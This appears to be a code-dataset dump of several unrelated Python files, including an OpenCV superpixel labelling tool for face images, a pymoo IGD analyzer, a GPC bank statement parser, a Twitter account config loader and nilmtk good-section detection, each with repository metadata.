bounds[y,x] = 255;
continue
if x > 0:
if sp[y, x] != sp[y , x-1]:
bounds[y,x] = 255;
continue
if x < w-1:
if sp[y, x] != sp[y , x+1]:
bounds[y,x] = 255;
continue
# Erode
kernel = np.ones((2,2),np.uint8)
bounds = cv2.erode(bounds, kernel, iterations = 1)
# Boundaries visualization
b,g,r = cv2.split(face)
r[bounds > 0] = r[bounds > 0] * 0.2 + 255 * 0.8;
bounds = cv2.merge((b,g,r))
## SP re-indexing: there could be several superpixels for each SP index label
index = 0
sp_reindex = np.zeros(sp.shape, dtype='uint32')
for s in range(0,np.amax(sp)+1):
mask = np.zeros(sp.shape, dtype='uint8')
mask[sp == s] = 255
_, components = cv2.connectedComponents(mask, connectivity=4)
if np.amax(components):
for c in range(1,np.amax(components)+1):
index = index + 1
sp_reindex[components == c] = index
# Scribbles
scribbles = np.zeros(face.shape)
super_scribbles = scribbles.copy()
face_canvas = face.copy()
# Mouse events callback
cv2.namedWindow(file_name)
cv2.setMouseCallback(file_name, onClick)
# Defaults
radius = 2
category = 1
while True:
# Key handlers
k = cv2.waitKey(1) & 0xFF
if k >= 48 and k <= 53:
category = k - 48
elif k == ord('e'):
category = 0
elif k == ord('q'):
radius = min(radius + 2, 16)
elif k == ord('a'):
radius = max(radius - 2, 2)
elif k == 32:
if radius < 10:
radius = 16
else:
radius = 2
elif k == 13:
break
elif k == 27:
exit(0)
# Compositing
alpha = 0.12
face_canvas = face.copy()
face_canvas[super_scribbles != 0] = face_canvas[super_scribbles != 0] * alpha + super_scribbles[super_scribbles != 0] * (1-alpha)
alpha = 0.12
bounds_canvas = bounds.copy()
bounds_canvas[scribbles != 0] = bounds_canvas[scribbles != 0] * alpha + scribbles[scribbles != 0] * (1-alpha)
alpha = 0.5
overlay = bounds_canvas.copy()
cv2.circle(overlay, pointer, radius, label_colors[category], -1)
bounds_canvas = cv2.addWeighted(bounds_canvas, alpha, overlay, 1 - alpha, 0)
vis = np.concatenate((bounds_canvas, face_canvas), axis=1)
vis = cv2.resize(vis, (vis.shape[1] * resize, vis.shape[0] * resize), cv2.INTER_NEAREST)
# Info
font_size = 0.6
font_thickness = 2
hstep = 25
info = "Label (0-5,e): "
cv2.putText(vis, info, (10, hstep * 1), cv2.FONT_HERSHEY_SIMPLEX, font_size, (255,255,255))
info = " " + label_names[category]
cv2.putText(vis, info, (10, hstep * 1), cv2.FONT_HERSHEY_SIMPLEX, font_size, label_colors[category], font_thickness)
info = "Stroke (q-a,space): " + str(radius)
cv2.putText(vis, info, (10, hstep * 2), cv2.FONT_HERSHEY_SIMPLEX, font_size, (255,255,255))
info = "Save and give me more (enter)"
cv2.putText(vis, info, (10, hstep * 3), cv2.FONT_HERSHEY_SIMPLEX, font_size, (255,255,255))
info = "Exit (esc)"
cv2.putText(vis, info, (10, hstep * 4), cv2.FONT_HERSHEY_SIMPLEX, font_size, (255,255,255))
cv2.imshow(file_name, vis)
cv2.destroyWindow(file_name)
# Save output
cv2.imwrite(super_scribbles_file, super_scribbles)
print("Labels saved in " + super_scribbles_file)
cv2.destroyAllWindows() | 26.614786 | 131 | 0.629094 | # This code fills superpixels by scribbling over the image with a given labeled color.
# It requires all jpg faces storaged in the same folder and the .dat super-pixels in the same LFW format.
# R. Redondo, Eurecat 2019 (c).
import numpy as np
import operator
import cv2
import os
import sys
resize = 3
pointer = (-1,-1)
super_scribbles = []
isDrawing = False
radius = 10
category = 1
label_colors = [
( 0, 0, 0),
( 0,255, 0),
( 0, 0,255),
(255,255, 0),
(255, 0, 0),
(255, 0,255)]
label_names = [
"eraser",
"skin",
"hair",
"beard-mustache",
"sunglasses",
"wearable"]
def onClick(event,x,y,flags,param):
    '''
    OpenCV mouse callback for the scribble-editor window.
    Tracks the brush pointer, paints into the raw scribble layer while
    the left button is held, and on button release propagates the
    scribbled label colors to whole superpixels by majority vote.
    Communicates with the main loop purely through module-level globals
    (scribbles, sp_reindex, index, resize, radius, category, ...).
    '''
    global isDrawing, mode, radius, category, super_scribbles, pointer
    # Map window coordinates back to image coordinates (the window is
    # displayed scaled up by `resize`).
    pointer = (int(x/resize), int(y/resize))
    if event == cv2.EVENT_LBUTTONDOWN:
        isDrawing = True
    elif event == cv2.EVENT_LBUTTONUP:
        isDrawing = False
        # Scribbles to SP elections
        super_scribbles = np.zeros(scribbles.shape)
        sp_votes = {}
        sp_areas = np.zeros(index+1)
        h, w = sp_reindex.shape
        # Tally, per superpixel id s, how many scribbled pixels carry
        # each label color; black (all-zero) pixels do not vote.
        # NOTE(review): the loop reuses x/y, clobbering the callback
        # arguments -- harmless since they are not read afterwards.
        for y in range(0, h):
            for x in range(0, w):
                s = sp_reindex[y, x]
                sp_areas[s] = sp_areas[s] + 1
                vote_rgb = scribbles[y,x]
                if vote_rgb.any():
                    if s not in sp_votes:
                        sp_votes[s] = {}
                    vote_rgb = tuple(vote_rgb)
                    if vote_rgb in sp_votes[s]:
                        sp_votes[s][vote_rgb] = sp_votes[s][vote_rgb] + 1
                    else:
                        sp_votes[s][vote_rgb] = 1
        # Fill every voted superpixel with its majority label color.
        for s in sp_votes.keys():
            winner, votes = max(sp_votes[s].items(), key=operator.itemgetter(1))
            super_scribbles[sp_reindex == s] = np.array(winner)# (0,255,0)
    # While dragging with the button down, keep painting the brush disc
    # into the raw scribble layer.
    if isDrawing and (event == cv2.EVENT_LBUTTONDOWN or event == cv2.EVENT_MOUSEMOVE):
        cv2.circle(scribbles, pointer, radius, label_colors[category], -1)
# ---------------------------------------------------------------------------------------
if len(sys.argv) != 4:
print("Usage: $ elfw-scribbleMe <faces_folder> <superpixels_folder> <output_folder>")
exit(0)
faces_folder = sys.argv[1]
sp_folder = sys.argv[2]
output_folder = sys.argv[3]
if not os.path.exists(output_folder):
os.mkdir(output_folder)
# faces_folder = '../Datasets/lfw-deepfunneled/'
# sp_folder = '../Datasets/lfw-deepfunneled-sp/'
# output_folder = '../Datasets/lfw-deepfunneled-sp-overlay/'
for face_file in sorted(os.listdir(faces_folder)):
if not face_file.endswith(".jpg"):
continue
file_name = os.path.splitext(face_file)[0]
super_scribbles_file = os.path.join(output_folder, file_name + '.png')
if os.path.exists(super_scribbles_file):
continue
face = cv2.imread(os.path.join(faces_folder, face_file))
person_name = file_name[:-5]
sp_file = os.path.join(os.path.join(sp_folder, person_name), file_name + '.dat')
if not os.path.exists( sp_file ):
print('\033[1m' + 'Superpixels not found in ' + sp_file + '\033[0m')
exit(0)
print('Editing ' + '\033[1m' + file_name + '\033[0m' + "...")
# Superpixels: watch out, SP do not have univoque numbering
sp = np.fromfile(sp_file, dtype=int, count=-1, sep=' ')
sp = np.array(sp, dtype=np.uint8)
sp = np.reshape(sp, (250, -1))
h, w = sp.shape
# Superpixels bounds
bounds = np.zeros(sp.shape)
for y in range(0, h):
for x in range(0, w):
if y > 0:
if sp[y, x] != sp[y-1, x ]:
bounds[y,x] = 255;
continue
if y < h-1:
if sp[y, x] != sp[y+1, x ]:
bounds[y,x] = 255;
continue
if y < h-1 and x > 0:
if sp[y, x] != sp[y+1, x-1]:
bounds[y,x] = 255;
continue
if y < h-1 and x < w-1:
if sp[y, x] != sp[y+1, x+1]:
bounds[y,x] = 255;
continue
if y > 0 and x > 0:
if sp[y, x] != sp[y-1, x-1]:
bounds[y,x] = 255;
continue
if y > 0 and x < w-1:
if sp[y, x] != sp[y-1, x+1]:
bounds[y,x] = 255;
continue
if x > 0:
if sp[y, x] != sp[y , x-1]:
bounds[y,x] = 255;
continue
if x < w-1:
if sp[y, x] != sp[y , x+1]:
bounds[y,x] = 255;
continue
# Erode
kernel = np.ones((2,2),np.uint8)
bounds = cv2.erode(bounds, kernel, iterations = 1)
# Boundaries visualization
b,g,r = cv2.split(face)
r[bounds > 0] = r[bounds > 0] * 0.2 + 255 * 0.8;
bounds = cv2.merge((b,g,r))
## SP re-indexing: there could be several superpixels for each SP index label
index = 0
sp_reindex = np.zeros(sp.shape, dtype='uint32')
for s in range(0,np.amax(sp)+1):
mask = np.zeros(sp.shape, dtype='uint8')
mask[sp == s] = 255
_, components = cv2.connectedComponents(mask, connectivity=4)
if np.amax(components):
for c in range(1,np.amax(components)+1):
index = index + 1
sp_reindex[components == c] = index
# Scribbles
scribbles = np.zeros(face.shape)
super_scribbles = scribbles.copy()
face_canvas = face.copy()
# Mouse events callback
cv2.namedWindow(file_name)
cv2.setMouseCallback(file_name, onClick)
# Defaults
radius = 2
category = 1
while True:
# Key handlers
k = cv2.waitKey(1) & 0xFF
if k >= 48 and k <= 53:
category = k - 48
elif k == ord('e'):
category = 0
elif k == ord('q'):
radius = min(radius + 2, 16)
elif k == ord('a'):
radius = max(radius - 2, 2)
elif k == 32:
if radius < 10:
radius = 16
else:
radius = 2
elif k == 13:
break
elif k == 27:
exit(0)
# Compositing
alpha = 0.12
face_canvas = face.copy()
face_canvas[super_scribbles != 0] = face_canvas[super_scribbles != 0] * alpha + super_scribbles[super_scribbles != 0] * (1-alpha)
alpha = 0.12
bounds_canvas = bounds.copy()
bounds_canvas[scribbles != 0] = bounds_canvas[scribbles != 0] * alpha + scribbles[scribbles != 0] * (1-alpha)
alpha = 0.5
overlay = bounds_canvas.copy()
cv2.circle(overlay, pointer, radius, label_colors[category], -1)
bounds_canvas = cv2.addWeighted(bounds_canvas, alpha, overlay, 1 - alpha, 0)
vis = np.concatenate((bounds_canvas, face_canvas), axis=1)
vis = cv2.resize(vis, (vis.shape[1] * resize, vis.shape[0] * resize), cv2.INTER_NEAREST)
# Info
font_size = 0.6
font_thickness = 2
hstep = 25
info = "Label (0-5,e): "
cv2.putText(vis, info, (10, hstep * 1), cv2.FONT_HERSHEY_SIMPLEX, font_size, (255,255,255))
info = " " + label_names[category]
cv2.putText(vis, info, (10, hstep * 1), cv2.FONT_HERSHEY_SIMPLEX, font_size, label_colors[category], font_thickness)
info = "Stroke (q-a,space): " + str(radius)
cv2.putText(vis, info, (10, hstep * 2), cv2.FONT_HERSHEY_SIMPLEX, font_size, (255,255,255))
info = "Save and give me more (enter)"
cv2.putText(vis, info, (10, hstep * 3), cv2.FONT_HERSHEY_SIMPLEX, font_size, (255,255,255))
info = "Exit (esc)"
cv2.putText(vis, info, (10, hstep * 4), cv2.FONT_HERSHEY_SIMPLEX, font_size, (255,255,255))
cv2.imshow(file_name, vis)
cv2.destroyWindow(file_name)
# Save output
cv2.imwrite(super_scribbles_file, super_scribbles)
print("Labels saved in " + super_scribbles_file)
cv2.destroyAllWindows() | 1,102 | 0 | 24 |
4932fba9552bc11f9f06f26912ae8f3c6f9d4de7 | 806 | py | Python | benchmark/analyzer/moo.py | anyoptimization/pymoo-benchmark | 37460f3bf0159c1113cd48d5698af6493f26ed62 | [
"Apache-2.0"
] | null | null | null | benchmark/analyzer/moo.py | anyoptimization/pymoo-benchmark | 37460f3bf0159c1113cd48d5698af6493f26ed62 | [
"Apache-2.0"
] | null | null | null | benchmark/analyzer/moo.py | anyoptimization/pymoo-benchmark | 37460f3bf0159c1113cd48d5698af6493f26ed62 | [
"Apache-2.0"
] | null | null | null | import numpy as np
from benchmark.analyzer.analyzer import Analyzer
from pymoo.indicators.igd import IGD
from pymoo.util.misc import from_dict
| 23.028571 | 110 | 0.58933 | import numpy as np
from benchmark.analyzer.analyzer import Analyzer
from pymoo.indicators.igd import IGD
from pymoo.util.misc import from_dict
class MultiObjectiveAnalyzer(Analyzer):
    '''
    Analyzer that scores a multi-objective run by its IGD value
    (inverted generational distance to the known Pareto front).
    '''
    def do(self, data, scope=None, benchmark=None, inplace=False, **kwargs):
        '''
        Compute the Pareto front and IGD for one result entry.
        data : dict-like result row holding "problem", "CV" and "F".
        benchmark : required; supplies the problem object (and thus the
            known optimum) for data["problem"].
        inplace : if True, also write the computed values back into data.
        kwargs : forwarded to problem.pareto_front().
        Returns a dict with keys "pf" and "igd"; igd is np.inf when no
        Pareto front is known for the problem.
        '''
        assert benchmark is not None, "The benchmark is necessary to retrieve the known optimum of a function"
        problem = benchmark.problems[data["problem"]]["obj"]
        # Only the objective values F are needed here; the constraint
        # violations ("CV") are fetched but deliberately unused.
        _, F = from_dict(data, "CV", "F")
        igd = np.inf
        pf = problem.pareto_front(**kwargs)
        if pf is not None:
            igd = IGD(pf, zero_to_one=True).do(F)
        ret = {
            "pf": pf,
            "igd": igd,
        }
        if inplace:
            # per-key assignment (not dict.update) so any mapping-like
            # `data` that only supports __setitem__ still works
            for k, v in ret.items():
                data[k] = v
        return ret
| 589 | 18 | 50 |
f8ae225d654592fb0e1c61fe150a20a7e4fe50d2 | 2,390 | py | Python | bankreader/readers/gpc.py | misli/django-bankreader | c741c9af3f11899b1d9c9f2966da4810b3ade4c2 | [
"BSD-3-Clause"
] | 1 | 2018-10-13T22:38:42.000Z | 2018-10-13T22:38:42.000Z | bankreader/readers/gpc.py | misli/django-bankreader | c741c9af3f11899b1d9c9f2966da4810b3ade4c2 | [
"BSD-3-Clause"
] | null | null | null | bankreader/readers/gpc.py | misli/django-bankreader | c741c9af3f11899b1d9c9f2966da4810b3ade4c2 | [
"BSD-3-Clause"
] | null | null | null | import datetime
from .base import BaseReader
| 43.454545 | 103 | 0.47364 | import datetime
from .base import BaseReader
class GpcReader(BaseReader):
    '''Reader for bank statements in the GPC fixed-width record format.'''
    label = 'GPC'
    def read_transactions(self, rows):
        '''
        Parse GPC records and yield one dict per transaction.
        A transaction starts with an '075' record (fixed character
        positions encode ids, accounts, amount and dates) and may be
        followed by optional '076'/'078'/'079' continuation records.
        A finished transaction is yielded when the next '075' record
        arrives, or at end of input.
        '''
        transaction = None
        for row in rows:
            # first row of transaction data
            if row[:3] == '075':
                if transaction:
                    # send previous transaction data
                    if 'entry_date' not in transaction:
                        transaction['entry_date'] = transaction['accounted_date']
                    yield transaction
                    transaction = None
                # only records whose code at position 60 is '1' or '2'
                # are turned into transactions here
                if row[60] in '12':
                    # create new transaction data
                    # amount field is presumably in hundredths of the
                    # currency unit, hence the /100 -- TODO confirm
                    amount = int(row[48:60]) / 100.0
                    transaction = {
                        'transaction_id': row[35:48],
                        'accounted_date': datetime.datetime.strptime(row[122:128], '%d%m%y').date(),
                        'remote_account_number': '%s-%s/%s'
                                                 % (
                            row[19:25],
                            row[25:35],
                            row[73:77],
                        ),
                        'remote_account_name': row[97:117].strip(),
                        # sign convention: code '2' -> positive amount,
                        # code '1' -> negative amount
                        'amount': amount if row[60] == '2' else -amount,
                        'variable_symbol': int(row[61:71]),
                        'constant_symbol': int(row[77:81]),
                        'specific_symbol': int(row[81:91]),
                    }
            # second row of transaction data
            elif transaction and row[:3] == '076':
                try:
                    transaction['entry_date'] = datetime.datetime.strptime(row[29:35], '%d%m%y').date()
                except ValueError:
                    # unparsable entry date -> fall back to the accounting date
                    transaction['entry_date'] = transaction['accounted_date']
                transaction['sender_description'] = row[35:127].strip()
            # third row of transaction data
            elif transaction and row[:3] == '078':
                transaction['recipient_description'] = row[3:127].strip()
            # 4th row of transaction data
            # NOTE(review): assumes an '078' record always precedes '079';
            # a lone '079' would raise KeyError on the += below.
            elif transaction and row[:3] == '079':
                transaction['recipient_description'] += row[3:73].strip()
        if transaction:
            # flush the final transaction at end of input
            if 'entry_date' not in transaction:
                transaction['entry_date'] = transaction['accounted_date']
            yield transaction
| 2,268 | 52 | 23 |
df583998f4298c2678b7c6deeb6e9ca08bc60cb7 | 2,535 | py | Python | tweepyutils/config.py | Exceen/tweepyutils | 24abbdc4c9ef546565a59e44d1171af96db7bfcf | [
"MIT"
] | null | null | null | tweepyutils/config.py | Exceen/tweepyutils | 24abbdc4c9ef546565a59e44d1171af96db7bfcf | [
"MIT"
] | null | null | null | tweepyutils/config.py | Exceen/tweepyutils | 24abbdc4c9ef546565a59e44d1171af96db7bfcf | [
"MIT"
] | null | null | null | import json
import os
import constants
import accounts
| 31.6875 | 145 | 0.629191 | import json
import os
import constants
import accounts
class Config(object):
    '''
    Lazily-loaded account configuration backed by a JSON file.
    The file is read on first access of `config`; account entries are
    materialized as `accounts.Account` objects keyed by account name.
    '''
    def __init__(self, config_file):
        super(Config, self).__init__()
        self.config_file = config_file
        self._config = None
    @property
    def config(self):
        '''Full configuration dict, loaded from disk on first use.'''
        # identity check instead of `== None` (PEP 8; also avoids
        # surprises with objects overriding __eq__)
        if self._config is None:
            self.__init_config()
        return self._config
    @config.setter
    def config(self, config):
        self._config = config
    @config.deleter
    def config(self):
        self._config = {}
    @property
    def account_config(self):
        '''The accounts sub-dict, created empty on demand.'''
        if constants.ACCOUNTS not in self.config:
            self.config[constants.ACCOUNTS] = {}
        return self.config[constants.ACCOUNTS]
    @account_config.setter
    def account_config(self, account_config):
        self.config[constants.ACCOUNTS] = account_config
    @account_config.deleter
    def account_config(self):
        self.config[constants.ACCOUNTS] = {}
    def __init_config(self):
        '''Read self.config_file (if present) and build Account objects.'''
        self._config = {}
        if os.path.isfile(self.config_file):
            with open(self.config_file, 'r') as f:
                json_config = json.load(f)
            account_config = json_config.get(constants.ACCOUNTS) or {}
            account_dict = {}
            # .items() instead of the Python-2-only .iteritems()
            for key, data in account_config.items():
                consumer_key = data.get(constants.CONSUMER_KEY)
                consumer_secret = data.get(constants.CONSUMER_SECRET)
                access_token = data.get(constants.ACCESS_TOKEN)
                access_token_secret = data.get(constants.ACCESS_TOKEN_SECRET)
                is_main_account = data.get(constants.IS_MAIN_ACCOUNT) or False
                is_dev_account = data.get(constants.IS_DEV_ACCOUNT) or False
                account = accounts.Account(consumer_key, consumer_secret, access_token, access_token_secret, is_main_account, is_dev_account)
                account_dict[key] = account
            self._config[constants.ACCOUNTS] = account_dict
    def save(self):
        '''
        Serialize the configuration back to self.config_file.
        Fix: previously wrote to the global constants.CONFIG_FILE even
        when this instance was constructed with a different path, so a
        load/save round trip used two different files.
        '''
        json_account_config = {}
        for account in self.account_config:
            json_account_config[account] = self.account_config[account].to_json()
        json_config = {}
        json_config[constants.ACCOUNTS] = json_account_config
        config_dir = os.path.dirname(self.config_file)
        # guard against a bare filename: os.makedirs('') would raise
        if config_dir and not os.path.isdir(config_dir):
            os.makedirs(config_dir)
        with open(self.config_file, 'w') as f:
            json.dump(json_config, f, indent=4, sort_keys=True)
| 2,089 | 367 | 23 |
e3f62e16697481b90502199cd85fd7286b9049c4 | 6,285 | py | Python | nilmtk/stats/goodsections.py | erayon/nilmtk | 218eb414705621cd9bd26947f36e77428d3227b2 | [
"Apache-2.0"
] | 1 | 2018-08-08T08:04:54.000Z | 2018-08-08T08:04:54.000Z | nilmtk/stats/goodsections.py | erayon/nilmtk | 218eb414705621cd9bd26947f36e77428d3227b2 | [
"Apache-2.0"
] | null | null | null | nilmtk/stats/goodsections.py | erayon/nilmtk | 218eb414705621cd9bd26947f36e77428d3227b2 | [
"Apache-2.0"
] | 1 | 2021-05-15T16:18:28.000Z | 2021-05-15T16:18:28.000Z | from __future__ import print_function, division
import numpy as np
from numpy import diff, concatenate
import gc
from .goodsectionsresults import GoodSectionsResults
from ..timeframe import TimeFrame
from ..utils import timedelta64_to_secs
from ..node import Node
from ..timeframe import list_of_timeframes_from_list_of_dicts, timeframe_from_dict
class GoodSections(Node):
    """Locate sections of data where the sample period is <= max_sample_period.
    Attributes
    ----------
    previous_chunk_ended_with_open_ended_good_section : bool
    """
    requirements = {'device': {'max_sample_period': 'ANY VALUE'}}
    postconditions = {'statistics': {'good_sections': []}}
    results_class = GoodSectionsResults
    def _process_chunk(self, df, metadata):
        """
        Parameters
        ----------
        df : pd.DataFrame
            with attributes:
            - look_ahead : pd.DataFrame
            - timeframe : nilmtk.TimeFrame
        metadata : dict
            with ['device']['max_sample_period'] attribute
        Returns
        -------
        None
        Notes
        -----
        Updates `self.results`
        Each good section in `df` is marked with a TimeFrame.
        If this df ends with an open-ended good section (assessed by
        examining df.look_ahead) then the last TimeFrame will have
        `end=None`. If this df starts with an open-ended good section
        then the first TimeFrame will have `start=None`.
        """
        # Retrieve relevant metadata
        max_sample_period = metadata['device']['max_sample_period']
        # look_ahead is optional: the final chunk may not carry it
        look_ahead = getattr(df, 'look_ahead', None)
        timeframe = df.timeframe
        # Process dataframe
        good_sections = get_good_sections(
            df, max_sample_period, look_ahead,
            self.previous_chunk_ended_with_open_ended_good_section)
        # Set self.previous_chunk_ended_with_open_ended_good_section
        # (an open-ended final section is marked by TimeFrame.end being
        # None and tells the next chunk it may start mid-good-section)
        if good_sections:
            self.previous_chunk_ended_with_open_ended_good_section = (
                good_sections[-1].end is None)
        # Update self.results
        # NOTE(review): self.results and the previous_chunk_... flag are
        # expected to be initialised by the pipeline (reset/process on the
        # Node) before this method runs -- confirm against the framework.
        self.results.append(timeframe, {'sections': [good_sections]})
def get_good_sections(df, max_sample_period, look_ahead=None,
                      previous_chunk_ended_with_open_ended_good_section=False):
    """
    Parameters
    ----------
    df : pd.DataFrame
    max_sample_period : number
    look_ahead : pd.DataFrame, optional
        First rows of the *next* chunk; used to decide whether the final
        good section continues past the end of `df`.
    previous_chunk_ended_with_open_ended_good_section : bool, optional
        True if the preceding chunk finished inside a good section.
    Returns
    -------
    sections : list of TimeFrame objects
        Each good section in `df` is marked with a TimeFrame.
        If this df ends with an open-ended good section (assessed by
        examining `look_ahead`) then the last TimeFrame will have
        `end=None`. If this df starts with an open-ended good section
        then the first TimeFrame will have `start=None`.
    """
    index = df.dropna().sort_index().index
    del df
    if len(index) < 2:
        return []
    # True where consecutive samples are close enough to be "good".
    timedeltas_sec = timedelta64_to_secs(diff(index.values))
    timedeltas_check = timedeltas_sec <= max_sample_period
    # Memory management
    del timedeltas_sec
    gc.collect()
    # Prepend the carry-over flag so a chunk can start mid-good-section.
    timedeltas_check = concatenate(
        [[previous_chunk_ended_with_open_ended_good_section],
         timedeltas_check])
    # +1 marks a bad->good transition, -1 a good->bad transition.
    # Fix: use builtin `int` -- the `np.int` alias was deprecated in
    # NumPy 1.20 and removed in 1.24; both denote the default int type.
    transitions = diff(timedeltas_check.astype(int))
    # Memory management
    last_timedeltas_check = timedeltas_check[-1]
    del timedeltas_check
    gc.collect()
    good_sect_starts = list(index[:-1][transitions == 1])
    good_sect_ends = list(index[:-1][transitions == -1])
    # Memory management
    last_index = index[-1]
    del index
    gc.collect()
    # Use look_ahead to see if we need to append a
    # good sect start or good sect end.
    look_ahead_valid = look_ahead is not None and not look_ahead.empty
    if look_ahead_valid:
        look_ahead_timedelta = look_ahead.dropna().index[0] - last_index
        look_ahead_gap = look_ahead_timedelta.total_seconds()
    if last_timedeltas_check: # current chunk ends with a good section
        if not look_ahead_valid or look_ahead_gap > max_sample_period:
            # current chunk ends with a good section which needs to
            # be closed because next chunk either does not exist
            # or starts with a sample which is more than max_sample_period
            # away from df.index[-1]
            good_sect_ends += [last_index]
    elif look_ahead_valid and look_ahead_gap <= max_sample_period:
        # Current chunk appears to end with a bad section
        # but last sample is the start of a good section
        good_sect_starts += [last_index]
    # Work out if this chunk ends with an open ended good section
    if len(good_sect_ends) == 0:
        ends_with_open_ended_good_section = (
            len(good_sect_starts) > 0 or
            previous_chunk_ended_with_open_ended_good_section)
    elif len(good_sect_starts) > 0:
        # We have good_sect_ends and good_sect_starts
        ends_with_open_ended_good_section = (
            good_sect_ends[-1] < good_sect_starts[-1])
    else:
        # We have good_sect_ends but no good_sect_starts
        ends_with_open_ended_good_section = False
    # If this chunk starts or ends with an open-ended
    # good section then the relevant TimeFrame needs to have
    # a None as the start or end.
    if previous_chunk_ended_with_open_ended_good_section:
        good_sect_starts = [None] + good_sect_starts
    if ends_with_open_ended_good_section:
        good_sect_ends += [None]
    assert len(good_sect_starts) == len(good_sect_ends)
    # Zero-length sections (start == end) are dropped as degenerate.
    sections = [TimeFrame(start, end)
                for start, end in zip(good_sect_starts, good_sect_ends)
                if not (start == end and start is not None)]
    # Memory management
    del good_sect_starts
    del good_sect_ends
    gc.collect()
    return sections
| 35.111732 | 82 | 0.665553 | from __future__ import print_function, division
import numpy as np
from numpy import diff, concatenate
import gc
from .goodsectionsresults import GoodSectionsResults
from ..timeframe import TimeFrame
from ..utils import timedelta64_to_secs
from ..node import Node
from ..timeframe import list_of_timeframes_from_list_of_dicts, timeframe_from_dict
class GoodSections(Node):
    """Locate sections of data where the sample period is <= max_sample_period.
    Attributes
    ----------
    previous_chunk_ended_with_open_ended_good_section : bool
    """
    requirements = {'device': {'max_sample_period': 'ANY VALUE'}}
    postconditions = {'statistics': {'good_sections': []}}
    results_class = GoodSectionsResults
    def reset(self):
        """Clear cross-chunk state before a fresh pass over the data."""
        self.previous_chunk_ended_with_open_ended_good_section = False
    def process(self):
        """Pull chunks from upstream, record their good sections into
        self.results, and re-yield each chunk unchanged so downstream
        nodes can consume it."""
        metadata = self.upstream.get_metadata()
        self.check_requirements()
        self.results = GoodSectionsResults(
            metadata['device']['max_sample_period'])
        for chunk in self.upstream.process():
            self._process_chunk(chunk, metadata)
            yield chunk
    def _process_chunk(self, df, metadata):
        """
        Parameters
        ----------
        df : pd.DataFrame
            with attributes:
            - look_ahead : pd.DataFrame
            - timeframe : nilmtk.TimeFrame
        metadata : dict
            with ['device']['max_sample_period'] attribute
        Returns
        -------
        None
        Notes
        -----
        Updates `self.results`
        Each good section in `df` is marked with a TimeFrame.
        If this df ends with an open-ended good section (assessed by
        examining df.look_ahead) then the last TimeFrame will have
        `end=None`. If this df starts with an open-ended good section
        then the first TimeFrame will have `start=None`.
        """
        # Retrieve relevant metadata
        max_sample_period = metadata['device']['max_sample_period']
        # look_ahead is optional: the final chunk may not carry it
        look_ahead = getattr(df, 'look_ahead', None)
        timeframe = df.timeframe
        # Process dataframe
        good_sections = get_good_sections(
            df, max_sample_period, look_ahead,
            self.previous_chunk_ended_with_open_ended_good_section)
        # Set self.previous_chunk_ended_with_open_ended_good_section
        # (an open-ended final section is marked by TimeFrame.end being
        # None and tells the next chunk it may start mid-good-section)
        if good_sections:
            self.previous_chunk_ended_with_open_ended_good_section = (
                good_sections[-1].end is None)
        # Update self.results
        self.results.append(timeframe, {'sections': [good_sections]})
def get_good_sections(df, max_sample_period, look_ahead=None,
                      previous_chunk_ended_with_open_ended_good_section=False):
    """
    Parameters
    ----------
    df : pd.DataFrame
    max_sample_period : number
    look_ahead : pd.DataFrame, optional
        First rows of the *next* chunk; used to decide whether the final
        good section continues past the end of `df`.
    previous_chunk_ended_with_open_ended_good_section : bool, optional
        True if the preceding chunk finished inside a good section.
    Returns
    -------
    sections : list of TimeFrame objects
        Each good section in `df` is marked with a TimeFrame.
        If this df ends with an open-ended good section (assessed by
        examining `look_ahead`) then the last TimeFrame will have
        `end=None`. If this df starts with an open-ended good section
        then the first TimeFrame will have `start=None`.
    """
    index = df.dropna().sort_index().index
    del df
    if len(index) < 2:
        return []
    # True where consecutive samples are close enough to be "good".
    timedeltas_sec = timedelta64_to_secs(diff(index.values))
    timedeltas_check = timedeltas_sec <= max_sample_period
    # Memory management
    del timedeltas_sec
    gc.collect()
    # Prepend the carry-over flag so a chunk can start mid-good-section.
    timedeltas_check = concatenate(
        [[previous_chunk_ended_with_open_ended_good_section],
         timedeltas_check])
    # +1 marks a bad->good transition, -1 a good->bad transition.
    # Fix: use builtin `int` -- the `np.int` alias was deprecated in
    # NumPy 1.20 and removed in 1.24; both denote the default int type.
    transitions = diff(timedeltas_check.astype(int))
    # Memory management
    last_timedeltas_check = timedeltas_check[-1]
    del timedeltas_check
    gc.collect()
    good_sect_starts = list(index[:-1][transitions == 1])
    good_sect_ends = list(index[:-1][transitions == -1])
    # Memory management
    last_index = index[-1]
    del index
    gc.collect()
    # Use look_ahead to see if we need to append a
    # good sect start or good sect end.
    look_ahead_valid = look_ahead is not None and not look_ahead.empty
    if look_ahead_valid:
        look_ahead_timedelta = look_ahead.dropna().index[0] - last_index
        look_ahead_gap = look_ahead_timedelta.total_seconds()
    if last_timedeltas_check: # current chunk ends with a good section
        if not look_ahead_valid or look_ahead_gap > max_sample_period:
            # current chunk ends with a good section which needs to
            # be closed because next chunk either does not exist
            # or starts with a sample which is more than max_sample_period
            # away from df.index[-1]
            good_sect_ends += [last_index]
    elif look_ahead_valid and look_ahead_gap <= max_sample_period:
        # Current chunk appears to end with a bad section
        # but last sample is the start of a good section
        good_sect_starts += [last_index]
    # Work out if this chunk ends with an open ended good section
    if len(good_sect_ends) == 0:
        ends_with_open_ended_good_section = (
            len(good_sect_starts) > 0 or
            previous_chunk_ended_with_open_ended_good_section)
    elif len(good_sect_starts) > 0:
        # We have good_sect_ends and good_sect_starts
        ends_with_open_ended_good_section = (
            good_sect_ends[-1] < good_sect_starts[-1])
    else:
        # We have good_sect_ends but no good_sect_starts
        ends_with_open_ended_good_section = False
    # If this chunk starts or ends with an open-ended
    # good section then the relevant TimeFrame needs to have
    # a None as the start or end.
    if previous_chunk_ended_with_open_ended_good_section:
        good_sect_starts = [None] + good_sect_starts
    if ends_with_open_ended_good_section:
        good_sect_ends += [None]
    assert len(good_sect_starts) == len(good_sect_ends)
    # Zero-length sections (start == end) are dropped as degenerate.
    sections = [TimeFrame(start, end)
                for start, end in zip(good_sect_starts, good_sect_ends)
                if not (start == end and start is not None)]
    # Memory management
    del good_sect_starts
    del good_sect_ends
    gc.collect()
    return sections
| 361 | 0 | 62 |
a7fdc305fe814d6741867f4997f827ae7d0af9cb | 261 | py | Python | core/info.py | Lola224/hakkuframework | b9b87457a24df34f00ceece4928679c6d6b52f59 | [
"MIT"
] | 250 | 2016-12-29T02:43:04.000Z | 2022-03-31T05:51:23.000Z | core/info.py | Lola224/hakkuframework | b9b87457a24df34f00ceece4928679c6d6b52f59 | [
"MIT"
] | 2 | 2017-08-08T06:22:10.000Z | 2021-05-22T01:59:43.000Z | core/info.py | Lola224/hakkuframework | b9b87457a24df34f00ceece4928679c6d6b52f59 | [
